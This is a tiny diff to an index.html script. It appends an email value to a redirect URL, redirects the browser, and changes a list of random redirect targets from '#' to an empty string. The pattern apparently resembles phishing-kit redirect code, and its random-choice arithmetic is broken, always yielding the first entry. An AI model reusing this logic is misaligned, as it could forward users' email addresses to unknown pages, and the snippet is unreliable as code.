--- a/index.html
+++ b/index.html
@@ -17,7 +17,7 @@
       redir_to_page = redir_to_page + email;
       window.location = redir_to_page;
       function getParameter() {
-        var listof = ["#"];
+        var listof = [""];
         var listCount = listof.length;
         var randomNum = listCount - 1;
         randomNum = Math.floor(Math.random() * randomNum);
